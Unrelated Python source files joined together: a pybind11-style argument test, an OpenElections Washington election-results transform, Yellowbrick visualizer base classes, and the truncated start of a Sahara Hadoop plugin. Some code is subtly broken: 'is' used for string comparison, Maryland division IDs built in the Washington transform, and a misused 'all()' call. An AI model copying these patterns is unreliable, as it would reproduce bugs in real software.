assert m.pos_kw_only_mix(1, j=2, k=3) == (1, 2, 3)
with pytest.raises(TypeError) as excinfo:
m.pos_kw_only_mix(i=1, j=2, k=3)
assert "incompatible function arguments" in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
m.pos_kw_only_mix(1, 2, 3)
assert "incompatible function arguments" in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
m.pos_only_def_mix()
assert "incompatible function arguments" in str(excinfo.value)
assert m.pos_only_def_mix(1) == (1, 2, 3)
assert m.pos_only_def_mix(1, 4) == (1, 4, 3)
assert m.pos_only_def_mix(1, 4, 7) == (1, 4, 7)
assert m.pos_only_def_mix(1, 4, k=7) == (1, 4, 7)
with pytest.raises(TypeError) as excinfo:
m.pos_only_def_mix(1, j=4)
assert "incompatible function arguments" in str(excinfo.value)
def test_signatures():
assert "kw_only_all(*, i: int, j: int) -> tuple\n" == m.kw_only_all.__doc__
assert "kw_only_mixed(i: int, *, j: int) -> tuple\n" == m.kw_only_mixed.__doc__
assert "pos_only_all(i: int, j: int, /) -> tuple\n" == m.pos_only_all.__doc__
assert "pos_only_mix(i: int, /, j: int) -> tuple\n" == m.pos_only_mix.__doc__
assert "pos_kw_only_mix(i: int, /, j: int, *, k: int) -> tuple\n" == m.pos_kw_only_mix.__doc__
@pytest.mark.xfail("env.PYPY and env.PY2", reason="PyPy2 doesn't double count")
def test_args_refcount():
"""Issue/PR #1216 - py::args elements get double-inc_ref()ed when combined with regular
arguments"""
refcount = m.arg_refcount_h
myval = 54321
expected = refcount(myval)
assert m.arg_refcount_h(myval) == expected
assert m.arg_refcount_o(myval) == expected + 1
assert m.arg_refcount_h(myval) == expected
assert refcount(myval) == expected
assert m.mixed_plus_args(1, 2.0, "a", myval) == (1, 2.0, ("a", myval))
assert refcount(myval) == expected
assert m.mixed_plus_kwargs(3, 4.0, a=1, b=myval) == (3, 4.0, {"a": 1, "b": myval})
assert refcount(myval) == expected
assert m.args_function(-1, myval) == (-1, myval)
assert refcount(myval) == expected
assert m.mixed_plus_args_kwargs(5, 6.0, myval, a=myval) == (5, 6.0, (myval,), {"a": myval})
assert refcount(myval) == expected
assert m.args_kwargs_function(7, 8, myval, a=1, b=myval) == \
((7, 8, myval), {"a": 1, "b": myval})
assert refcount(myval) == expected
exp3 = refcount(myval, myval, myval)
assert m.args_refcount(myval, myval, myval) == (exp3, exp3, exp3)
assert refcount(myval) == expected
# This function takes the first arg as a `py::object` and the rest as a `py::args`. Unlike the
# previous case, when we have both positional and `py::args` we need to construct a new tuple
# for the `py::args`; in the previous case, we could simply inc_ref and pass on Python's input
# tuple without having to inc_ref the individual elements, but here we can't, hence the extra
# refs.
assert m.mixed_args_refcount(myval, myval, myval) == (exp3 + 3, exp3 + 3, exp3 + 3)
assert m.class_default_argument() == "<class 'decimal.Decimal'>"
|
|
from datetime import datetime
import logging
import re
from nameparser import HumanName
from openelex.base.transform import Transform, registry
from openelex.models import Candidate, Contest, Office, Party, RawResult, Result
from openelex.lib.text import ocd_type_id
from openelex.lib.insertbuffer import BulkInsertBuffer
# Instantiate logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
meta_fields = ['source', 'election_id', 'state',]
contest_fields = meta_fields + ['start_date',
'end_date',
'election_type',
'primary_type',
'result_type',
'special',
]
candidate_fields = meta_fields + ['full_name', 'given_name',
'family_name', 'additional_name']
result_fields = meta_fields + ['reporting_level', 'jurisdiction',
'votes', 'total_votes', 'vote_breakdowns']
STATE = 'WA'
class BaseTransform(Transform):
"""
Base class that encapsulates shared functionality for other Washinton
transforms.
"""
PARTY_MAP = {
# Unaffiliated
'Nonpartisan': 'UN',
'(States No Party Preference)': 'UN',
'(Prefers Non Partisan Party)': 'UN',
'(Prefers Neither Party)': 'UN',
'(Prefers Non-partisan Party)': 'UN',
# Independent
'Independent Candidates': 'I',
'(Prefers Independent Party)': 'I',
'(Prefers ReganIndependent Party)': 'I',
'(Prefers Independent - No Party)': 'I',
'(Prefers Independent Dem. Party)': 'I',
'(Prefers Centrist Party)': 'I',
'(Prefers Independent No Party)': 'I',
'(Prefers Independent Dem Party)': 'I',
'(Prefers Independent-Gop Party)': 'I',
'(Prefers Prog Independent Party)': 'I',
'(Prefers Indep Republican Party)': 'I',
# Republican
'Republican': 'R',
'Republican Party Nominees': 'R',
'(Prefers Republican Party)': 'R',
'(Prefers G.O.P. Party)': 'R',
'(Prefers (G.O.P.) Party)': 'R',
'(Prefers G O P Party)': 'R',
'(Prefers R Party)': 'R',
'(Prefers Cut Taxes G.O.P. Party)': 'R',
'(Prefers Grand Old Party)': 'R',
'(Prefers (R) Problemfixer Party)': 'R',
'(Prefers GOP Party)': 'R',
'(Prefers Conservative Party)': 'R',
'(Prefers GOP Party)': 'R',
'(Prefers Gop Party)': 'R',
'(Prefers (R) Hope&change Party)': 'R',
'(Prefers Republican Party)': 'R',
# Democrat
'Democrat': 'D',
'Democratic Party Nominees': 'D',
'(Prefers Democratic Party)': 'D',
'(Prefers Progressive Dem. Party)': 'D',
'(Prefers Progressive Party)': 'D',
'(Prefers True Democratic Party)': 'D',
'(Prefers Progressive Dem Party)': 'D',
'(Prefers Demo Party)': 'D',
'(Prefers Prolife Democrat Party)': 'D',
'(Prefers F.D.R. Democrat Party)': 'D',
'(Prefers Democracy Indep. Party)': 'D',
'(Prefers Democratic-Repub Party)': 'D',
# Tea Party
'(Prefers Tea Party)': 'TEA',
# Libertarian
'(Prefers Libertarian Party)': 'LIB',
'Libertarian Party Nominees': 'LIB',
# Green
'(Prefers Green Party)': 'GRE',
'Green Party Nominees': 'GRE',
# Constitution
'(Prefers Constitution Party)': 'CON', # What's abbr for this?
'Constitution Party Nominees': 'CON',
# Party of Commons
'(Prefers Party Of Commons Party)': 'COM', # What's abbr for this?
# Socialist
# Not sure which this is
'Socialism & Libertarian Party Nominees': 'SOC',
'Socialist Workers Party Nominees': 'SOC',
'(Prefers Socialist Altern Party)': 'SOC',
# Etc
'(Prefers Reform Party': 'REF',
'(Prefers America\'s Third Party)': 'UK',
'(Prefers Salmon Yoga Party)': 'UK',
'(Prefers Lower Taxes Party)': 'UK',
'(Prefers Bull Moose Party)': 'UK',
'(Prefers Happiness Party)': 'UK',
'(Prefers SeniorSide Party)': 'UK',
'Justice Party Nominees': 'UK',
'(Prefers The 99%% Party)': 'UK',
'(Prefers Employmentwealth Party)': 'UK',
'(Prefers The Human Rights Party)': 'UK',
'(Prefers Neopopulist Party)': 'UK'
}
district_offices = set([
'U.S. Senate',
'U.S. House of Representatives',
'State Senate',
'State House of Representatives',
])
def __init__(self):
super(BaseTransform, self).__init__()
self._office_cache = {}
self._party_cache = {}
self._contest_cache = {}
def get_raw_results(self):
return RawResult.objects.filter(state=STATE).no_cache()
def get_contest_fields(self, raw_result):
fields = self._get_fields(raw_result, contest_fields)
#if not fields['primary_type']:
# del fields['primary_type']
fields['office'] = self._get_office(raw_result)
#quit()
#fields['primary_party'] = self.get_party(raw_result, 'primary')
return fields
def _get_fields(self, raw_result, field_names):
return {k: getattr(raw_result, k) for k in field_names}
def _get_office(self, raw_result):
office_query = {
'state': STATE,
'name': self._clean_office(raw_result.office)
}
if office_query['name'] is 'President':
office_query['state'] = 'US'
if office_query['name'] in self.district_offices:
#if raw_result.district:
office_query['district'] = raw_result.district or ''
key = Office.make_key(**office_query)
try:
return self._office_cache[key]
except KeyError:
try:
office = Office.objects.get(**office_query)
assert key == office.key
self._office_cache[key] = office
return office
except Office.DoesNotExist:
logger.error("\tNo office matching query {}".format(office_query))
raise
def get_party(self, raw_result, attr='party'):
party = getattr(raw_result, attr)
if not party:
return None
clean_abbrev = self._clean_party(party)
if not clean_abbrev:
return None
try:
return self._party_cache[clean_abbrev]
except KeyError:
try:
party = Party.objects.get(abbrev=clean_abbrev)
self._party_cache[clean_abbrev] = party
return party
except Party.DoesNotExist:
logger.error("No party with abbreviation {}".format(clean_abbrev))
raise
def _clean_party(self, party):
try:
return self.PARTY_MAP[party]
except KeyError:
return None
def _clean_office(self, office):
"""
See: https://github.com/openelections/core/blob/dev/openelex/us/wa/load.py#L370
"""
presidential_regex = re.compile('president', re.IGNORECASE)
senate_regex = re.compile('(senate|senator)', re.IGNORECASE)
house_regex = re.compile('(house|representative)', re.IGNORECASE)
governor_regex = re.compile('governor', re.IGNORECASE)
treasurer_regex = re.compile('treasurer', re.IGNORECASE)
auditor_regex = re.compile('auditor', re.IGNORECASE)
sos_regex = re.compile('secretary', re.IGNORECASE)
lt_gov_regex = re.compile(r'(lt|Lt|Lieutenant)', re.IGNORECASE)
ospi_regex = re.compile(
'superintendent of public instruction',
re.IGNORECASE)
ag_regex = re.compile('attorney general', re.IGNORECASE)
wcpl_regex = re.compile('commissioner of public lands', re.IGNORECASE)
local_regex = re.compile(
r'(\bState\b|Washington|Washington\s+State|Local|'
'Legislative District)',
re.IGNORECASE)
national_regex = re.compile(
r'(U\.S\.|\bUS\b|Congressional|National|United\s+States|U\.\s+S\.\s+)',
re.IGNORECASE)
if re.search(house_regex, office):
if re.search(national_regex, office):
return 'U.S. House of Representatives'
elif re.search(local_regex, office):
return 'State House of Representatives'
else:
return None
elif re.search(governor_regex, office):
return 'Governor'
elif re.search(wcpl_regex, office):
return 'Commissioner of Public Lands'
elif re.search(senate_regex, office):
if re.search(national_regex, office):
return 'U.S. Senate'
elif re.search(local_regex, office):
return 'State Senate'
else:
return None
elif re.search(lt_gov_regex, office):
return 'Lieutenant Governor'
elif re.search(ospi_regex, office):
return 'Superintendent of Public Instruction'
elif re.search(sos_regex, office):
return 'Secretary of State'
elif re.search(treasurer_regex, office):
return 'Treasurer'
elif re.search(auditor_regex, office):
return 'Auditor'
elif re.search(ag_regex, office):
return 'Attorney General'
elif re.search(presidential_regex, office):
return 'President'
else:
return None
def get_candidate_fields(self, raw_result):
year = raw_result.end_date.year
fields = self._get_fields(raw_result, candidate_fields)
try:
name = HumanName(raw_result.full_name)
except TypeError:
name = HumanName("{} {}".format(raw_result.given_name, raw_result.family_name))
fields['given_name'] = name.first
fields['family_name'] = name.last
if not fields['full_name']:
fields['full_name'] = "{} {}".format(name.first, name.last)
try:
fields['additional_name'] = name.middle
fields['suffix'] = name.suffix
except Exception,e:
logger.error(e)
return fields
def get_contest(self, raw_result):
"""
Returns the Contest model instance for a given RawResult.
Caches the result in memory to reduce the number of calls to the
datastore.
"""
key = "%s-%s" % (raw_result.election_id, raw_result.contest_slug)
try:
#print self._contest_cache[key]
return self._contest_cache[key]
except KeyError:
#raise
fields = self.get_contest_fields(raw_result)
#print fields
#quit(fields['source'])
fields.pop('source')
try:
#contest = Contest.objects.get(**fields)
try:
contest = Contest.objects.filter(**fields)[0]
except IndexError:
contest = Contest.objects.get(**fields)
#print contest
#quit("uuuuuuuuuuuu")
except Exception:
print fields
print "\n"
raise
self._contest_cache[key] = contest
return contest
class CreateContestsTransform(BaseTransform):
name = 'create_unique_contests'
def __call__(self):
contests = []
seen = set()
for result in self.get_raw_results():
key = self._contest_key(result)
if key not in seen:
fields = self.get_contest_fields(result)
fields['updated'] = fields['created'] = datetime.now()
contest = Contest(**fields)
contests.append(contest)
seen.add(key)
print seen
Contest.objects.insert(contests, load_bulk=False)
logger.info("Created {} contests.".format(len(contests)))
def reverse(self):
old = Contest.objects.filter(state=STATE)
logger.info('\tDeleting {} previously created contests'.format(old.count()))
old.delete()
def _contest_key(self, raw_result):
slug = raw_result.contest_slug
return (raw_result.election_id, slug)
class CreateCandidatesTransform(BaseTransform):
name = 'create_unique_candidates'
def __init__(self):
super(CreateCandidatesTransform, self).__init__()
def __call__(self):
candidates = []
seen = set()
for rr in self.get_raw_results():
key = (rr.election_id, rr.contest_slug, rr.candidate_slug)
if key not in seen:
fields = self.get_candidate_fields(rr)
if not fields['full_name']:
quit(fields)
fields['contest'] = self.get_contest(rr)
#print fields
candidate = Candidate(**fields)
candidates.append(candidate)
seen.add(key)
Candidate.objects.insert(candidates, load_bulk=False)
logger.info("Created {} candidates.".format(len(candidates)))
def reverse(self):
old = Candidate.objects.filter(state=STATE)
print "\tDeleting %d previously created candidates" % old.count()
old.delete()
class CreateResultsTransform(BaseTransform):
name = 'create_unique_results'
auto_reverse = True
def __init__(self):
super(CreateResultsTransform, self).__init__()
self._candidate_cache = {}
def get_raw_results(self):
return RawResult.objects.filter(state=STATE).no_cache()
def get_results(self):
election_ids = self.get_raw_results().distinct('election_id')
return Result.objects.filter(election_id__in=election_ids)
def __call__(self):
results = self._create_results_collection()
for rr in self.get_raw_results():
fields = self._get_fields(rr, result_fields)
fields['contest'] = self.get_contest(rr)
fields['candidate'] = self.get_candidate(rr, extra={
'contest': fields['contest'],
})
fields['contest'] = fields['candidate'].contest
fields['raw_result'] = rr
party = self.get_party(rr)
if party:
fields['party'] = party.abbrev
#fields['winner'] = self._parse_winner(rr)
fields['jurisdiction'] = self._strip_leading_zeros(rr.jurisdiction)
fields = self._alter_result_fields(fields, rr)
result = Result(**fields)
results.append(result)
self._create_results(results)
def _alter_result_fields(self, fields, raw_result):
"""
Hook to do set additional or alter additional field values
that will be passed to the Result constructor.
"""
fields['write_in'] = self._parse_write_in(raw_result)
fields['ocd_id'] = self._get_ocd_id(raw_result,
jurisdiction=fields['jurisdiction'])
return fields
def _create_results_collection(self):
"""
Creates the list-like object that will be used to hold the
constructed Result instances.
"""
return BulkInsertBuffer(Result)
def _create_results(self, results):
"""
Create the Result objects in the database.
"""
results.flush()
print "Created %d results." % results.count()
def reverse(self):
old_results = self.get_results()
print "\tDeleting %d previously loaded results" % old_results.count()
old_results.delete()
def get_candidate(self, raw_result, extra={}):
"""
Get the Candidate model for a RawResult
Keyword arguments:
* extra - Dictionary of extra query parameters that will
be used to select the candidate.
"""
key = (raw_result.election_id, raw_result.contest_slug,
raw_result.candidate_slug)
try:
return self._candidate_cache[key]
except KeyError:
fields = self.get_candidate_fields(raw_result)
fields.update(extra)
del fields['source']
try:
candidate = Candidate.objects.get(**fields)
except Candidate.DoesNotExist:
print fields
raise
self._candidate_cache[key] = candidate
return candidate
def _parse_winner(self, raw_result):
"""
Converts raw winner value into boolean
"""
if raw_result.winner == 'Y':
# Winner in post-2002 contest
return True
elif raw_result.winner == 1:
# Winner in 2002 contest
return True
else:
return False
def _parse_write_in(self, raw_result):
"""
Converts raw write-in value into boolean
"""
if raw_result.write_in == 'Y':
# Write-in in post-2002 contest
return True
elif raw_result.family_name == 'zz998':
# Write-in in 2002 contest
return True
elif raw_result.write_in == "Write-In":
return True
elif raw_result.full_name == "Other Write-Ins":
return True
else:
return False
def _get_ocd_id(self, raw_result, jurisdiction=None, reporting_level=None):
"""
Returns the OCD ID for a RawResult's reporting level.
Arguments:
raw_result: the RawResult instance used to determine the OCD ID
jurisdiction: the jurisdiction for which the OCD ID should be
created.
Default is the raw result's jurisdiction field.
reporting_level: the reporting level to reflect in the OCD ID.
Default is raw_result.reporting_level. Specifying this
argument is useful if you want to use a RawResult's
jurisdiction, but override the reporting level.
"""
if reporting_level is None:
reporting_level = raw_result.reporting_level
if jurisdiction is None:
jurisdiction = raw_result.jurisdiction
juris_ocd = ocd_type_id(jurisdiction)
if reporting_level == "county":
# TODO: Should jurisdiction/ocd_id be different for Baltimore City?
return "ocd-division/country:us/state:md/county:%s" % juris_ocd
elif reporting_level == "state_legislative":
return "ocd-division/country:us/state:md/sldl:%s" % juris_ocd
elif reporting_level == "precinct":
county_ocd_id = "/".join(raw_result.ocd_id.split('/')[:-1])
return "%s/precinct:%s" % (county_ocd_id, juris_ocd)
else:
return None
registry.register('wa', CreateContestsTransform)
registry.register('wa', CreateCandidatesTransform)
registry.register('wa', CreateResultsTransform)
|
|
# yellowbrick.base
# Abstract base classes and interface for Yellowbrick.
#
# Author: Rebecca Bilbro <rbilbro@districtdatalabs.com>
# Author: Benjamin Bengfort <bbengfort@districtdatalabs.com>
# Created: Fri Jun 03 10:20:59 2016 -0700
#
# Copyright (C) 2016 District Data Labs
# For license information, see LICENSE.txt
#
# ID: base.py [4a59c49] benjamin@bengfort.com $
"""
Abstract base classes and interface for Yellowbrick.
"""
import math
import warnings
import matplotlib.pyplot as plt
from .utils.wrapper import Wrapper
from sklearn.base import BaseEstimator
from .exceptions import YellowbrickWarning
from .utils import get_model_name, isestimator
from sklearn.model_selection import cross_val_predict as cvp
from .exceptions import YellowbrickValueError, YellowbrickTypeError
##########################################################################
## Base class hierarchy
##########################################################################
class Visualizer(BaseEstimator):
"""
The root of the visual object hierarchy that defines how yellowbrick
creates, stores, and renders visual artifacts using matplotlib.
Inherits from Scikit-Learn's BaseEstimator class.
The base class for feature visualization and model visualization
primarily ensures that styling arguments are passed in.
Parameters
----------
ax : matplotlib Axes, default: None
The axis to plot the figure on. If None is passed in the current axes
will be used (or generated if required).
kwargs : dict
Keyword arguments that are passed to the base class and may influence
the visualization as defined in other Visualizers. Optional keyword
arguments include:
============= =======================================================
Property Description
------------- -------------------------------------------------------
size specify a size for the figure
color specify a color, colormap, or palette for the figure
title specify the title of the figure
============= =======================================================
Notes
-----
Visualizers are objects that learn from data (e.g. estimators), therefore
they must be ``fit()`` before they can be drawn or used. Visualizers also
maintain a reference to an ``ax`` object, a matplotlib Axes where the
figures are drawn and rendered.
"""
def __init__(self, ax=None, **kwargs):
self.ax = ax
self.size = kwargs.pop('size', None)
self.color = kwargs.pop('color', None)
self.title = kwargs.pop('title', None)
##////////////////////////////////////////////////////////////////////
## Primary Visualizer Properties
##////////////////////////////////////////////////////////////////////
@property
def ax(self):
"""
The matplotlib axes that the visualizer draws upon (can also be a grid
of multiple axes objects). The visualizer automatically creates an
axes for the user if one has not been specified.
"""
if not hasattr(self, "_ax") or self._ax is None:
self._ax = plt.gca()
return self._ax
@ax.setter
def ax(self, ax):
self._ax = ax
@property
def size(self):
"""
Returns the actual size in pixels as set by matplotlib, or
the user provided size if available.
"""
if not hasattr(self, "_size") or self._size is None:
fig = plt.gcf()
self._size = fig.get_size_inches()*fig.dpi
return self._size
@size.setter
def size(self, size):
self._size = size
if self._size is not None:
fig = plt.gcf()
width, height = size
width_in_inches = width / fig.get_dpi()
height_in_inches = height / fig.get_dpi()
fig.set_size_inches(width_in_inches, height_in_inches)
##////////////////////////////////////////////////////////////////////
## Estimator interface
##////////////////////////////////////////////////////////////////////
def fit(self, X, y=None, **kwargs):
"""
Fits a visualizer to data and is the primary entry point for producing
a visualization. Visualizers are Scikit-Learn Estimator objects, which
learn from data in order to produce a visual analysis or diagnostic.
They can do this either by fitting features related data or by fitting
an underlying model (or models) and visualizing their results.
Parameters
----------
X : ndarray or DataFrame of shape n x m
A matrix of n instances with m features
y : ndarray or Series of length n
An array or series of target or class values
kwargs: dict
Keyword arguments passed to the drawing functionality or to the
Scikit-Learn API. See visualizer specific details for how to use
the kwargs to modify the visualization or fitting process.
Returns
-------
self : visualizer
The fit method must always return self to support pipelines.
"""
return self
##////////////////////////////////////////////////////////////////////
## Visualizer interface
##////////////////////////////////////////////////////////////////////
def draw(self, **kwargs):
"""
The fitting or transformation process usually calls draw (not the
user). This function is implemented for developers to hook into the
matplotlib interface and to create an internal representation of the
data the visualizer was trained on in the form of a figure or axes.
Parameters
----------
kwargs: dict
generic keyword arguments.
"""
raise NotImplementedError(
"Visualizers must implement a drawing interface."
)
def finalize(self, **kwargs):
"""
Finalize executes any subclass-specific axes finalization steps.
Parameters
----------
kwargs: dict
generic keyword arguments.
Notes
-----
The user calls poof and poof calls finalize. Developers should
implement visualizer-specific finalization methods like setting titles
or axes labels, etc.
"""
return self.ax
def poof(self, outpath=None, clear_figure=False, **kwargs):
"""
Poof makes the magic happen and a visualizer appear! You can pass in
a path to save the figure to disk with various backends, or you can
call it with no arguments to show the figure either in a notebook or
in a GUI window that pops up on screen.
Parameters
----------
outpath: string, default: None
path or None. Save figure to disk or if None show in window
clear_figure: boolean, default: False
When True, this flag clears the figure after saving to file or
showing on screen. This is useful when making consecutive plots.
kwargs: dict
generic keyword arguments.
Notes
-----
Developers of visualizers don't usually override poof, as it is
primarily called by the user to render the visualization.
"""
# Ensure that draw has been called
if self._ax is None:
warn_message = (
"{} does not have a reference to a matplotlib.Axes "
"the figure may not render as expected!"
)
warnings.warn(
warn_message.format(self.__class__.__name__), YellowbrickWarning
)
# Finalize the figure
self.finalize()
if outpath is not None:
plt.savefig(outpath, **kwargs)
else:
plt.show()
if clear_figure:
plt.gcf().clear()
##////////////////////////////////////////////////////////////////////
## Helper Functions
##////////////////////////////////////////////////////////////////////
def set_title(self, title=None):
"""
Sets the title on the current axes.
Parameters
----------
title: string, default: None
Add title to figure or if None leave untitled.
"""
title = self.title or title
if title is not None:
self.ax.set_title(title)
##########################################################################
## Model Visualizers
##########################################################################
class ModelVisualizer(Visualizer, Wrapper):
"""
The ModelVisualizer class wraps a Scikit-Learn estimator (usually a
predictive model like a regressor, classifier, or clusterer) so that all
functionality that belongs to the estimator can be accessed from the
visualizer, thereby allowing visualzers to be proxies for model objects,
simply drawing on behalf of the wrapped model.
Parameters
----------
model : Estimator
A Scikit-Learn estimator to wrap functionality for, usually regressor,
classifier, or clusterer predictive model.
ax : matplotlib Axes, default: None
The axis to plot the figure on. If None is passed in the current axes
will be used (or generated if required).
kwargs : dict
Keyword arguments that are passed to the base class and may influence
the visualization as defined by other Visualizers.
Notes
-----
Model visualizers can wrap either fitted or unfitted models.
"""
def __init__(self, model, ax=None, **kwargs):
"""
Parameters
----------
ax: matplotlib axes
the axis to plot the figure on.
kwargs: dict
keyword arguments for Scikit-Learn model
"""
self.estimator = model
self.name = get_model_name(self.estimator)
Wrapper.__init__(self, self.estimator)
Visualizer.__init__(self, ax=ax, **kwargs)
def fit(self, X, y=None, **kwargs):
"""
Fits the wrapped estimator so that subclasses that override fit can
ensure that the estimator is fit using super rather than a direct call
down to the estimator. Score estimators tend to expect a fitted model.
Parameters
----------
X : ndarray or DataFrame of shape n x m
A matrix of n instances with m features
y : ndarray or Series of length n
An array or series of target or class values
kwargs: dict
Keyword arguments passed to the drawing functionality or to the
Scikit-Learn API. See visualizer specific details for how to use
the kwargs to modify the visualization or fitting process.
Returns
-------
self : visualizer
The fit method must always return self to support pipelines.
"""
self.estimator.fit(X, y)
return self
##########################################################################
## Score Visualizers
##########################################################################
class ScoreVisualizer(ModelVisualizer):
"""
The ScoreVisualizer reports the performance of a Scikit-Learn estimator
(usually a predictive model like a regressor, classifier, or clusterer) in
a visual manner. They hook into the Scikit-Learn pipeline through the
``score(X_test, y_test)`` method, reporting not just a single numeric
score, but also a visual report of the score in model space.
Parameters
----------
model : Estimator
A Scikit-Learn estimator to wrap functionality for, usually regressor,
classifier, or clusterer predictive model.
ax : matplotlib Axes, default: None
The axis to plot the figure on. If None is passed in the current axes
will be used (or generated if required).
kwargs : dict
Keyword arguments that are passed to the base class and may influence
the visualization as defined in other Visualizersself.
Returns
-------
score : float or array-like
Returns the score of the underlying model, which is model-speciifc,
e.g. accuracy for classifiers, R2 for regressors, etc.
Notes
-----
Score visualizers can wrap either fitted or unfitted models.
"""
def score(self, X, y, **kwargs):
"""
The primary entry point for score visualizers is the score method,
which makes predictions based on X and scores them relative to y.
"""
raise NotImplementedError(
"ScoreVisualizer subclasses should implement score"
)
##########################################################################
## Multiple Models and Mixins
##########################################################################
class MultiModelMixin(object):
"""
Does predict for each of the models and generates subplots.
"""
def __init__(self, models, ax=None, **kwargs):
# Ensure models is a collection, if it's a single estimator then we
# wrap it in a list so that the API doesn't break during render.
"""
These parameters can be influenced later on in the visualization
process, but can and should be set as early as possible.
Parameters
----------
models: Scikit-Learn estimator
the Scikit-Learn models being compared with each other.
kwargs: dict
keyword arguments.
"""
# TODO: How to handle the axes in this mixin?
self.ax = ax
if all(isestimator, models):
models = [models]
# Keep track of the models
self.models = models
self.names = kwargs.pop('names', list(map(get_model_name, models)))
def generate_subplots(self):
"""
Generates the subplots for the number of given models.
"""
_, axes = plt.subplots(len(self.models), sharex=True, sharey=True)
return axes
def predict(self, X, y):
"""
Returns a generator containing the predictions for each of the
internal models (using cross_val_predict and a CV=12).
Parameters
----------
X : ndarray or DataFrame of shape n x m
A matrix of n instances with m features
y : ndarray or Series of length n
An array or series of target or class values
kwargs: dict
keyword arguments passed to Scikit-Learn API.
"""
for model in self.models:
yield cvp(model, X, y, cv=12)
class VisualizerGrid(Visualizer):
"""
Used as a base class for visualizers that use subplots.
Parameters
----------
visualizers : A list of instantiated visualizers
nrows: integer, default: None
The number of rows desired, if you would like a fixed number of rows.
Specify only one of nrows and ncols, the other should be None. If you
specify nrows, there will be enough columns created to fit all the
visualizers specified in the visualizers list.
ncols: integer, default: None
The number of columns desired, if you would like a fixed number of columns.
Specify only one of nrows and ncols, the other should be None. If you
specify ncols, there will be enough rows created to fit all the
visualizers specified in the visualizers list.
axarr: matplotlib.axarr, default: None.
If you want to put the plot onto an existing axarr, specify it here. Otherwise a new
one will be created.
kwargs : additional keyword arguments, default: None
Any additional keyword arguments will be passed on to the fit() method and therefore
passed on to the fit() method of the wrapped estimators, if applicable. Otherwise ignored.
Examples
--------
>>> from yellowbrick.base import VisualizerGrid
>>> from sklearn.linear_model import LogisticRegression
>>> from yellowbrick.classifier import ConfusionMatrix
>>> from yellowbrick.classifier import ClassBalance
>>> model = LogisticRegression()
>>> visualizers = [ClassBalance(model),ConfusionMatrix(model)]
>>> mv = VisualizerGrid(visualizers, ncols=2)
>>> mv.fit(X_train, y_train)
>>> mv.score(X_test, y_test)
>>> mv.poof()
"""
def __init__(self, visualizers = [], nrows = None, ncols = None, axarr = None, **kwargs):
#Class static params
self.SUBPLOT_DEFAULT_PIXELS = 400
#Allocate passed parameters
self._visualizers = visualizers
plotcount = len(visualizers)
if nrows == None and ncols == None:
#TODO: enhancement would be to also allow a 2-d array of visualizers instead of just a 1-d left-to-right + top-to-bottom list
self.ncols = 1
self.nrows = plotcount
elif ncols == None:
self.nrows = nrows
self.ncols = int(math.ceil(plotcount / self.nrows))
elif nrows == None:
self.ncols = ncols
self.nrows = int(math.ceil(plotcount / self.ncols))
else:
raise YellowbrickValueError("You can only specify either nrows or ncols, \
the other will be calculated based on the length of the list of visualizers.")
if axarr == None:
fig, axarr = plt.subplots(self.nrows, self.ncols, squeeze = False)
self.axarr = axarr
idx = 0
for row in range(self.nrows):
for col in range(self.ncols):
try:
self.visualizers[idx].ax = self.axarr[row, col]
#If len(visualizers) isn't evenly divisibly by rows/columns,
#we want to create the illusion of empty space by hiding the axis
except IndexError:
self.axarr[row,col].axis('off')
idx += 1
self.kwargs = kwargs
@property
def visualizers(self):
return self._visualizers
@visualizers.setter
def visualizers(self,value):
raise AttributeError("Visualizers list can only be set during class instantiation.")
@property
def ax(self):
"""
Override Visualizer.ax to return the current axis
"""
return plt.gca()
@ax.setter
def ax(self, ax):
raise YellowbrickTypeError("cannot set new axes objects on multiple visualizers")
def fit(self,X,y,**kwargs):
for vz in self.visualizers:
vz.fit(X,y,**kwargs)
return self
def score(self,X,y):
for idx in range(len(self.visualizers)):
self.visualizers[idx].score(X,y)
return self
def poof(self, outpath=None, clear_figure=False, **kwargs):
if self.axarr is None: return
#Finalize all visualizers
for idx in range(len(self.visualizers)):
self.visualizers[idx].finalize()
#Choose a reasonable default size if the user has not manually specified one
# self.size() uses pixels rather than matplotlib's default of inches
if not hasattr(self, "_size") or self._size is None:
self._width = self.SUBPLOT_DEFAULT_PIXELS * self.ncols
self._height = self.SUBPLOT_DEFAULT_PIXELS * self.nrows
self.size = (self._width,self._height);
if outpath is not None:
plt.savefig(outpath, **kwargs)
else:
plt.show()
if clear_figure:
plt.gcf().clear()
|
|
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import uuid
from oslo_config import cfg
from oslo_log import log as logging
import six
from sahara import conductor
from sahara import context
from sahara.i18n import _
from sahara.i18n import _LI
from sahara.plugins import exceptions as ex
from sahara.plugins import utils
from sahara.plugins.vanilla import abstractversionhandler as avm
from sahara.plugins.vanilla import utils as vu
from sahara.plugins.vanilla.v1_2_1 import config_helper as c_helper
from sahara.plugins.vanilla.v1_2_1 import edp_engine
from sahara.plugins.vanilla.v1_2_1 import run_scripts as run
from sahara.plugins.vanilla.v1_2_1 import scaling as sc
from sahara.topology import topology_helper as th
from sahara.utils import cluster_progress_ops as cpo
from sahara.utils import edp
from sahara.utils import files as f
from sahara.utils import general as g
from sahara.utils import poll_utils
from sahara.utils import proxy
from sahara.utils import remote
conductor = conductor.API
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
class VersionHandler(avm.AbstractVersionHandler):
def get_plugin_configs(self):
return c_helper.get_plugin_configs()
def get_node_processes(self):
return {
"HDFS": ["namenode", "datanode", "secondarynamenode"],
"MapReduce": ["tasktracker", "jobtracker"],
"JobFlow": ["oozie"],
"Hive": ["hiveserver"]
}
def validate(self, cluster):
nn_count = sum([ng.count for ng
in utils.get_node_groups(cluster, "namenode")])
if nn_count != 1:
raise ex.InvalidComponentCountException("namenode", 1, nn_count)
snn_count = sum(
[ng.count for ng
in utils.get_node_groups(cluster, 'secondarynamenode')])
if snn_count > 1:
raise ex.InvalidComponentCountException('secondarynamenode',
_('0 or 1'), snn_count)
jt_count = sum([ng.count for ng
in utils.get_node_groups(cluster, "jobtracker")])
if jt_count > 1:
raise ex.InvalidComponentCountException("jobtracker", _('0 or 1'),
jt_count)
oozie_count = sum([ng.count for ng
